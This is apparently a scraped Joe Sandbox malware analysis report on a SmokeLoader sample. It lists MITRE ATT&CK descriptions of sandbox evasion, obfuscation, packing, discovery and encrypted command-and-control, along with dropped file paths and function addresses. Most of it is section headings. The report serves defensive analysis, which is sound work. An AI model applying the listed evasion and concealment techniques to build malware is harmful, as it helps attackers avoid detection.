Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wBgwzVbZuV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F421.exe

C:\Users\user\AppData\Roaming\rghrbbi

C:\Users\user\AppData\Roaming\wehrbbi

C:\Users\user\AppData\Roaming\wehrbbi:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
wBgwzVbZuV.exe

Function 00415B00 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 283
timefilelibraryCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02DFA8A7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02C3003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 004157A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02C30E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON